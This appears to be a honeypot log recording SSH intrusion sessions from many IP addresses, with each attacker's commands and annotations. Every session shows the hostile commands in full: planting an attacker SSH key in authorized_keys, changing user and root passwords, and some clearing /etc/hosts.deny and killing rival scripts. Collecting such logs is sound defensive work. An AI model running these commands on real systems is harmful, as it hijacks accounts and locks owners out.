Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 phantom_root_55 (103.151.140.79) β€” South Jakarta, Indonesia Β· 2 sessions Β· 40 cmds
2026-05-27 12:31 EDT Β· as raj/raj@123, support/support
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "support\nvNfLXfZyJ0dz\nvNfLXfZyJ0dz"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "support\nvNfLXfZyJ0dz\nvNfLXfZyJ0dz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "raj@123\nJiclqmctYOHy\nJiclqmctYOHy"|passwd|bash
$ echo "raj@123\nJiclqmctYOHy\nJiclqmctYOHy\n"|passwd
🎭 eagle_root_27 (165.154.36.71) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-27 12:47 EDT Β· as joe/joe
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "joe\nHUI2zpLbL7nk\nHUI2zpLbL7nk"|passwd|bash
$ Enter new UNIX password:
$ echo "joe\nHUI2zpLbL7nk\nHUI2zpLbL7nk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_11 (210.16.168.11) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-27 12:40 EDT Β· as integration/integration
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "integration\n04xegMjYajBW\n04xegMjYajBW"|passwd|bash
$ Enter new UNIX password:
$ echo "integration\n04xegMjYajBW\n04xegMjYajBW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 borscht_root_3 (178.140.144.68) β€” Moscow, Russia Β· 2 sessions Β· 40 cmds
2026-05-27 12:30 EDT Β· as raj/raj@123, support/support
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "raj@123\nSH75DdZ70EcK\nSH75DdZ70EcK"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "raj@123\nSH75DdZ70EcK\nSH75DdZ70EcK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "support\nZrbvup2HwEnY\nZrbvup2HwEnY"|passwd|bash
$ echo "support\nZrbvup2HwEnY\nZrbvup2HwEnY\n"|passwd
🎭 phantom_root_56 (103.118.29.129) β€” LiΓͺn Chiểu, Vietnam Β· 3 sessions Β· 59 cmds
2026-05-19 14:31 EDT Β· as claude/claude, raj/raj@123, root/stingray
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "raj@123\ntWuBWH3jc7zz\ntWuBWH3jc7zz"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "raj@123\ntWuBWH3jc7zz\ntWuBWH3jc7zz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:hmlEnnJfVpCr"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "claude\nb2tJrPnR7w61\nb2tJrPnR7w61"|passwd|bash
$ echo "claude\nb2tJrPnR7w61\nb2tJrPnR7w61\n"|passwd
🎭 silk_root_16 (27.156.0.250) β€” Fuzhou, China Β· 1 session Β· 1 cmd
2026-05-27 12:24 EDT Β· as root/ο»Ώ------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 capoeira_root (186.233.118.22) β€” Rio de Janeiro, Brazil Β· 9 sessions Β· 174 cmds
2026-05-13 10:03 EDT Β· as ashok/ashok, pakchoi/Kermit123@, root/2069
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—9 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—9 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—9 // CPU profiling
$ echo -e "ashok\nPmQGvQhMhfsd\nPmQGvQhMhfsd"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "ashok\nPmQGvQhMhfsd\nPmQGvQhMhfsd\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—9 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—9
$ ls -lh $(which ls) Γ—9
$ which ls Γ—9
$ crontab -l Γ—9 // persistence setup
$ w Γ—9 // logged-in users check
$ uname -m Γ—9
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—9 // CPU profiling
$ top Γ—9 // process monitoring
$ uname Γ—9 // OS identification
$ uname -a Γ—9 // OS/kernel identification
$ whoami Γ—9 // privilege check
$ lscpu | grep Model Γ—9
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—9
$ echo -e "socks\n97vf6zM6788K\n97vf6zM6788K"|passwd|bash
$ echo "socks\n97vf6zM6788K\n97vf6zM6788K\n"|passwd
$ echo "root:zphaYvGuinEl"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—6 // execute from /tmp
$ echo "root:Odb8vcW35EZr"|chpasswd|bash
$ echo "root:Vjia0Ngv7LTH"|chpasswd|bash
$ echo -e "Kermit123@\n8zvgVbVT1hVG\n8zvgVbVT1hVG"|passwd|bash
$ echo "Kermit123@\n8zvgVbVT1hVG\n8zvgVbVT1hVG\n"|passwd
$ echo "root:BKuAVF82YK4I"|chpasswd|bash
$ echo "root:NKuOWpHeyVtf"|chpasswd|bash
$ echo "root:uVTPnPerj5dd"|chpasswd|bash
🎭 k-pop_root_11 (121.161.30.2) β€” Goyang-si, South Korea Β· 1 session Β· 19 cmds
2026-05-27 11:56 EDT Β· as root/Hello12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:eCNfHbP2jtKF"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_56 (35.210.61.208) β€” Brussels, Belgium Β· 1 session Β· 20 cmds
2026-05-27 11:54 EDT Β· as ashok/ashok
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ashok\nNfh9OqznlznO\nNfh9OqznlznO"|passwd|bash
$ Enter new UNIX password:
$ echo "ashok\nNfh9OqznlznO\nNfh9OqznlznO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_58 (188.127.174.233) β€” Madrid, Spain Β· 1 session Β· 19 cmds
2026-05-27 11:52 EDT Β· as root/Aa123456#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:9EAT7qSXxDVk"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_59 (201.186.40.161) β€” ChillΓ‘n, Chile Β· 2 sessions Β· 22 cmds
2026-05-23 05:21 EDT Β· as aroot/aroot, systemd/Voidsetdownload.so
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Voidsetdownload.so\nkyD9lUC3nWvn\nkyD9lUC3nWvn"|passwd|bash
$ Enter new UNIX password:
$ echo "Voidsetdownload.so\nkyD9lUC3nWvn\nkyD9lUC3nWvn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 windmill_root_6 (89.190.156.8) β€” Amsterdam, Netherlands Β· 2 sessions Β· 39 cmds
2026-05-27 10:19 EDT Β· as root/root@123, systemd/Voidsetdownload.so
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Voidsetdownload.so\nqPwLj6ftDUPc\nqPwLj6ftDUPc"|passwd|bash
$ Enter new UNIX password:
$ echo "Voidsetdownload.so\nqPwLj6ftDUPc\nqPwLj6ftDUPc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:nhWB17gKkTMg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 liberty_root_20 (47.180.114.229) β€” Fontana, United States Β· 2 sessions Β· 39 cmds
2026-05-22 23:58 EDT Β· as root/2020., systemd/Voidsetdownload.so
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Voidsetdownload.so\nWi3Ht8XpONaP\nWi3Ht8XpONaP"|passwd|bash
$ Enter new UNIX password:
$ echo "Voidsetdownload.so\nWi3Ht8XpONaP\nWi3Ht8XpONaP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:QNzom8pd8dhc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 ghost_root_71 (105.233.67.36) β€” Cape Town, South Africa Β· 2 sessions Β· 40 cmds
2026-05-27 07:39 EDT Β· as carol/carol, systemd/Voidsetdownload.so
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Voidsetdownload.so\nYMVHWr2c7uAP\nYMVHWr2c7uAP"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Voidsetdownload.so\nYMVHWr2c7uAP\nYMVHWr2c7uAP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
